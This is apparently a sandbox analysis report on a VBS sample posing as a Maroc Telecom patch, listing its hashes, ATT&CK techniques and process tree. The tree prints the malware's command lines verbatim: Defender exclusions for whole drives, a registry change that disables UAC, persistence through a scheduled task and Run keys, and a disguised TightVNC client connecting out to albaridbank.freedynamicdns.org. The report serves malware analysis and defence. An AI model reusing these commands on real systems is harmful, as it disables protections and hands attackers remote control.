Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
13/08/2024, 16:50
Static task
static1
Behavioral task
behavioral1
Sample
13082024_1650_patch_08_24_maroc_telecom.vbs
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
13082024_1650_patch_08_24_maroc_telecom.vbs
Resource
win10v2004-20240802-en
General
-
Target
13082024_1650_patch_08_24_maroc_telecom.vbs
-
Size
85KB
-
MD5
256ff7496d004c17a81294e45341a696
-
SHA1
45af0de886b8fc54cfd8acfd2b386a77bba63887
-
SHA256
295ef3832bb6ef89c93c39b62542be9f490b74a082c2b06955aa3351c3005002
-
SHA512
b430b6da57b6937c9468cebee49f655b50fa11e3ed57c0c584d50b0d677119f5db2d893a1bcde422e8087af6a92f7aee03d26e3b14e8a3f4ed3ae9221f4a3ac3
-
SSDEEP
96:AF9Gmbz9Lz3a74Tbq2HY0UiAvSHLQV0gUiAvSHmnWLF:AF9GS9LzacThY0UiAvSrQV0gUiAvSxF
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" REG.exe -
Blocklisted process makes network request 5 IoCs
flow pid Process 28 4204 WScript.exe 32 4204 WScript.exe 34 4204 WScript.exe 41 4204 WScript.exe 43 4204 WScript.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5116 powershell.exe 1364 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation WScript.exe -
Deletes itself 1 IoCs
pid Process 4204 WScript.exe -
Executes dropped EXE 10 IoCs
pid Process 3368 7g.exe 1840 agent.exe 4376 agent.exe 2284 securitysvc.exe 4640 securitysvc.exe 4720 securitysvc.exe 4352 securitysvc.exe 3468 securitysvc.exe 3632 securitysvc.exe 2124 securitysvc.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_2EDFBF = "\"C:\\Users\\Public\\WindowsUpdate\\agent.exe\" lnrm5$+wu4j%=vogu" agent.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tvncontrol = "\"C:\\Users\\Public\\WindowsUpdate\\Common\\securitysvc.exe\" -controlservice -slave" securitysvc.exe -
Indicator Removal: Clear Persistence 1 TTPs 1 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
pid Process 3076 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 20 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language agent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language REG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language securitysvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language securitysvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language securitysvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language securitysvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language securitysvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language securitysvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language securitysvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7g.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Kills process with taskkill 4 IoCs
pid Process 4148 taskkill.exe 1224 taskkill.exe 4856 taskkill.exe 2408 taskkill.exe -
Modifies registry key 1 TTPs 3 IoCs
pid Process 4988 REG.exe 2832 reg.exe 2156 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1200 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5116 powershell.exe 5116 powershell.exe 1840 agent.exe 1840 agent.exe 1364 powershell.exe 1364 powershell.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1364 powershell.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe 1840 agent.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1840 agent.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 5116 powershell.exe Token: SeRestorePrivilege 3368 7g.exe Token: 35 3368 7g.exe Token: SeSecurityPrivilege 3368 7g.exe Token: SeSecurityPrivilege 3368 7g.exe Token: SeDebugPrivilege 1364 powershell.exe Token: SeDebugPrivilege 4148 taskkill.exe Token: SeDebugPrivilege 2408 taskkill.exe Token: SeDebugPrivilege 1224 taskkill.exe Token: SeDebugPrivilege 4856 taskkill.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe 3468 securitysvc.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1840 agent.exe -
Suspicious use of WriteProcessMemory 61 IoCs
description pid Process procid_target PID 4204 wrote to memory of 4840 4204 WScript.exe 92 PID 4204 wrote to memory of 4840 4204 WScript.exe 92 PID 4840 wrote to memory of 5116 4840 cmd.exe 94 PID 4840 wrote to memory of 5116 4840 cmd.exe 94 PID 4204 wrote to memory of 3368 4204 WScript.exe 97 PID 4204 wrote to memory of 3368 4204 WScript.exe 97 PID 4204 wrote to memory of 3368 4204 WScript.exe 97 PID 4204 wrote to memory of 1840 4204 WScript.exe 101 PID 4204 wrote to memory of 1840 4204 WScript.exe 101 PID 4204 wrote to memory of 1840 4204 WScript.exe 101 PID 1840 wrote to memory of 1364 1840 agent.exe 102 PID 1840 wrote to memory of 1364 1840 agent.exe 102 PID 1840 wrote to memory of 1364 1840 agent.exe 102 PID 1840 wrote to memory of 4988 1840 agent.exe 103 PID 1840 wrote to memory of 4988 1840 agent.exe 103 PID 1840 wrote to memory of 4988 1840 agent.exe 103 PID 1840 wrote to memory of 1200 1840 agent.exe 106 PID 1840 wrote to memory of 1200 1840 agent.exe 106 PID 1840 wrote to memory of 1200 1840 agent.exe 106 PID 1840 wrote to memory of 4148 1840 agent.exe 109 PID 1840 wrote to memory of 4148 1840 agent.exe 109 PID 1840 wrote to memory of 4148 1840 agent.exe 109 PID 1840 wrote to memory of 2408 1840 agent.exe 110 PID 1840 wrote to memory of 2408 1840 agent.exe 110 PID 1840 wrote to memory of 2408 1840 agent.exe 110 PID 1840 wrote to memory of 1224 1840 agent.exe 115 PID 1840 wrote to memory of 1224 1840 agent.exe 115 PID 1840 wrote to memory of 1224 1840 agent.exe 115 PID 1840 wrote to memory of 2284 1840 agent.exe 117 PID 1840 wrote to memory of 2284 1840 agent.exe 117 PID 1840 wrote to memory of 2284 1840 agent.exe 117 PID 1840 wrote to memory of 4640 1840 agent.exe 118 PID 1840 wrote to memory of 4640 1840 agent.exe 118 PID 1840 wrote to memory of 4640 1840 agent.exe 118 PID 1840 wrote to memory of 4720 1840 agent.exe 119 PID 1840 wrote to memory of 4720 1840 agent.exe 119 PID 1840 wrote to memory of 4720 1840 agent.exe 119 PID 4720 wrote to memory of 3468 4720 securitysvc.exe 121 PID 4720 wrote to memory of 3468 4720 securitysvc.exe 121 PID 4720 wrote to memory of 3468 4720 securitysvc.exe 121 PID 1840 wrote to memory of 3632 1840 agent.exe 122 PID 1840 wrote to memory of 3632 1840 agent.exe 122 PID 1840 wrote to memory of 3632 1840 agent.exe 122 PID 4352 wrote to memory of 2124 4352 securitysvc.exe 123 PID 4352 wrote to memory of 2124 4352 securitysvc.exe 123 PID 4352 wrote to memory of 2124 4352 securitysvc.exe 123 PID 1840 wrote to memory of 3076 1840 agent.exe 125 PID 1840 wrote to memory of 3076 1840 agent.exe 125 PID 1840 wrote to memory of 3076 1840 agent.exe 125 PID 3076 wrote to memory of 2832 3076 cmd.exe 127 PID 3076 wrote to memory of 2832 3076 cmd.exe 127 PID 3076 wrote to memory of 2832 3076 cmd.exe 127 PID 3076 wrote to memory of 2156 3076 cmd.exe 128 PID 3076 wrote to memory of 2156 3076 cmd.exe 128 PID 3076 wrote to memory of 2156 3076 cmd.exe 128 PID 3076 wrote to memory of 740 3076 cmd.exe 129 PID 3076 wrote to memory of 740 3076 cmd.exe 129 PID 3076 wrote to memory of 740 3076 cmd.exe 129 PID 3076 wrote to memory of 4856 3076 cmd.exe 130 PID 3076 wrote to memory of 4856 3076 cmd.exe 130 PID 3076 wrote to memory of 4856 3076 cmd.exe 130
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\13082024_1650_patch_08_24_maroc_telecom.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:"2⤵
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5116
-
-
-
C:\Users\Public\7g.exe"C:\Users\Public\7g.exe" e -p1625093 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\agent.7z"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3368
-
-
C:\Users\Public\WindowsUpdate\agent.exe"C:\Users\Public\WindowsUpdate\agent.exe" lnrm5$+wu4j%=vogu2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -ex bypass -C "Add-MpPreference -ExclusionPath 'C:','d:','e:','f:','g:','h:', 'C:\Users\Public\WindowsUpdate\'"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1364
-
-
C:\Windows\SysWOW64\REG.exe"REG" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4988
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn WindowsUpdateTaskScheduler /XML "C:\Users\Public\WindowsUpdate\\Common\xml.xml"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1200
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /f /im securitysvc.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4148
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /f /im netsvc.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /f /im securitysvc.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
C:\Users\Public\WindowsUpdate\Common\securitysvc.exe"C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -remove -silent3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2284
-
-
C:\Users\Public\WindowsUpdate\Common\securitysvc.exe"C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -install -silent3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4640
-
-
C:\Users\Public\WindowsUpdate\Common\securitysvc.exe"C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -start3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Users\Public\WindowsUpdate\Common\securitysvc.exe"C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -controlservice -slave4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3468
-
-
-
C:\Users\Public\WindowsUpdate\Common\securitysvc.exe"C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -controlservice -connect albaridbank.freedynamicdns.org:654333⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3632
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftEdgeAutoLaunch_2EDFBF /f & REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftEdgeAutoLaunch_2EDFBF /f & SCHTASKS /Delete /TN WindowsUpdateTaskScheduler /F & taskkill /f /im "agent.exe" & del "C:\Users\Public\WindowsUpdate\agent.exe" & rmdir /s /q "C:\Users\Public\WindowsUpdate\Common"3⤵
- Indicator Removal: Clear Persistence
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Windows\SysWOW64\reg.exeREG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftEdgeAutoLaunch_2EDFBF /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2832
-
-
C:\Windows\SysWOW64\reg.exeREG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MicrosoftEdgeAutoLaunch_2EDFBF /f4⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2156
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Delete /TN WindowsUpdateTaskScheduler /F4⤵
- System Location Discovery: System Language Discovery
PID:740
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "agent.exe"4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4856
-
-
-
-
C:\Users\Public\WindowsUpdate\agent.exeC:\Users\Public\WindowsUpdate\agent.exe lnrm5$+wu4j%=vogu1⤵
- Executes dropped EXE
PID:4376
-
C:\Users\Public\WindowsUpdate\Common\securitysvc.exe"C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -service1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Users\Public\WindowsUpdate\Common\securitysvc.exe"C:\Users\Public\WindowsUpdate\Common\securitysvc.exe" -desktopserver -logdir "C:\Windows\system32\config\systemprofile\AppData\Roaming\TightVNC" -loglevel 0 -shmemname Global\kyfcyfojrndplkfbnxxc2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2124
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
1Clear Persistence
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
577KB
MD511fa744ebf6a17d7dd3c58dc2603046d
SHA1d99de792fd08db53bb552cd28f0080137274f897
SHA2561b16c41ae39b679384b06f1492b587b650716430ff9c2e079dca2ad1f62c952d
SHA512424196f2acf5b89807f4038683acc50e7604223fc630245af6bab0e0df923f8b1c49cb09ac709086568c214c3f53dcb7d6c32e8a54af222a3ff78cfab9c51670
-
Filesize
76KB
MD57bc5225db0c41ff9227295e666600312
SHA1e78dcca63b0ef68fb3833ab1fe3bb13b066e7122
SHA256528e99d415a5a743af6f8b68b1fe87b133a0a6bc22b48e33465c374a09e57703
SHA512e4837f3fe5c8275d0a389b60b0303617da0d7b737e87cc5ca3190e338ff2bdeb1604fef20bd35b911c2e945198d46f7df5a91d8a3677b3381e9c449878a55a95
-
Filesize
1.9MB
MD5f34aa5938ab898f964c4f50d49ddc05a
SHA156bc17db1ce446fbd25106903b14d8ef6f0d6975
SHA256a6cd84730fa0ae73cc2298ea6d259656b34aff4e0f2c606b55982aafed7225d3
SHA512409d6cb252829423a39ad85cb6824cb8f1e82392ba2769b4b0138d50644b39705e1097ee71a2d29f0790a78363f15219433027deecff676afa148df61623c106
-
Filesize
1.4MB
MD5c0f2536aab89e866be517ada093d6ae9
SHA18025575cc5832876fc2fd0895816381c724b3480
SHA256ce1758d559910b328d60d5aa4587ce3602471c3d6d5351b6162998d5f2251599
SHA5129d4dd916f09dd0dffe175d059af23df9a115a78d3a34033c7562f95746e244d59c015ff52b682d07e4e0ff748b614471a077163422a39331630d27eaf013efb6
-
Filesize
43B
MD511b00cd8aaf7e64945e1d3ae970e60d5
SHA1685ee5e63e6daa1cd705c64a3d9381b253cffe5b
SHA256c9f745531f4786534342775b8d630139fbab20c921a01774a79844137e1d4cdc
SHA512d33a2a35cdd04d2cfe9c0bc9df1c9ebc3c2ded04382aefd69fcd3693919b6f3c5206954bcf22d05560a6ce43374c13db1d0d251d0ad55fb9bbed87f5364569cf
-
Filesize
1KB
MD5a3ffc26af4bc23881333c6168ac582cf
SHA1efabc9e281eef3f8889743f9a0a384c6bc44e694
SHA2566cb41ae787d7b9c1db2a65cb95672ad78fd1ae814d581d9bb9b493da4c13859c
SHA512aa7cea924c5c720e7fb9df4655ca821acbfeecb54cb3f92a2037d1591be3ce47a3e862103656683e2d050a951c30b5fa3d78e3e682184d1661cc178524467fa5
-
Filesize
3.5MB
MD5231b19fcd10a574335b4bdc87bcb4ae4
SHA1f0adb64152558db2578b2bea362728d1bec25cde
SHA256eb09ee350a19054ce5ada302bb4a1586795e713745a16fd7bf3ec70096f47461
SHA51279eeb89e35e1035a8245a69a6f66dca3bb74ce498fef9cf69004483b45f69c1a2e0c9481b3de70881cb6d041f110b67363a085e0b7e44117554ea2c22fff9ed6
-
Filesize
2.6MB
MD5ae5b78797fdf5f862f979faf5862db72
SHA1753df8bdb95e4a7e526ea32fa54e9a4ab0c714c1
SHA256dd467e0657fd6c0e1ee571cfa05aac81b147ac8a7289ea8499c2162f7be12a97
SHA5122670bf113bcece56e167d78f300d0f2da6481a1fa7415d08174e00f6723bf446fdecff2e88a7010d71d987b087ba683df5a23fed8e2e01f7f9dc1f3bd8fb7a80